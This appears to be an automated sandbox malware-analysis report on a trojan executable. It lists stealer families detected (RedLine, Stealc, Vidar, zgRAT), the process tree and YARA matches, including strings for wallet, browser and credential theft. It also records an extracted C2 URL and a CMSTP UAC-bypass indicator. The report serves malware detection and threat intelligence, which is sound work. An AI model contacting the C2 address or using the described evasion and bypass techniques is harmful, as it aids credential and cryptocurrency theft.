Edit tour

Windows Analysis Report
QPoX60yhZt.exe

Overview

General Information

Sample name:	QPoX60yhZt.exe renamed because original name is a hash value
Original sample name:	96b085b3f6ee7441236cee54161309d0.exe
Analysis ID:	1432036
MD5:	96b085b3f6ee7441236cee54161309d0
SHA1:	88cf7eaf5db9a625a4fd922afe4c851abdd86b0b
SHA256:	132d0526eda9bdadbb2b402d44738d4fc91255556325b6a1991e053d1710fcce
Tags:	32exetrojan
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QPoX60yhZt.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\QPoX60yhZt.exe" MD5: 96B085B3F6EE7441236CEE54161309D0)

u5mc.0.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Local\Temp\u5mc.0.exe" MD5: 3FEEFB5213B0FF82FD83AC762EF28021)

cmd.exe (PID: 6416 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

BAEBFIIECB.exe (PID: 5216 cmdline: "C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 2036 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7452 cmdline: "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u5mc.3.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\u5mc.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 1132 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7888 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 4324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\hwfesovsnabgua	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\ougwwmmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\ougwwmmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\ougwwmmp	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u5mc.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2426494529.0000000005010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000000.1816333516.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000003.1816995670.00000000071EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1687809776.00000000041B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2084106678.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000015.00000002.2426187840.00000000049F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2426146878.0000000000FA2000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2129887694.0000000004286000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000000.2024395013.000001950682B000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u5mc.0.exe PID: 7364	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u5mc.0.exe PID: 7364	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u5mc.0.exe PID: 7364	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 7452	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7496	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7496	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7092	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: run.exe PID: 7564	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7888	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.u5mc.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5mc.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u5mc.0.exe.4180e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5mc.0.exe.41b0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5mc.0.exe.41b0000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u5mc.0.exe.4180e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
21.2.cmd.exe.50100c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.cmd.exe.50100c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.2.cmd.exe.50100c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
21.2.cmd.exe.50100c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.cmd.exe.50100c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
21.2.cmd.exe.50100c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
24.2.MSBuild.exe.fa0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.MSBuild.exe.fa0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.MSBuild.exe.fa0000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.2.u5mc.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5mc.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.u5mc.0.exe.4180e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5mc.0.exe.4180e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
3.2.cmd.exe.5c100c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.cmd.exe.5c100c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.cmd.exe.5c100c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
21.2.cmd.exe.4a3de64.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.4a3de64.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be8eb15.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951be8eb15.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.run.exe.39e015b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.39e015b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.51fc976.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.51fc976.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
21.2.cmd.exe.49f9976.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
21.2.cmd.exe.49f9976.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
2.2.run.exe.3fd415b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.3fd415b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195248d0000.15.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.run.exe.399c86d.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.run.exe.399c86d.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19524750000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
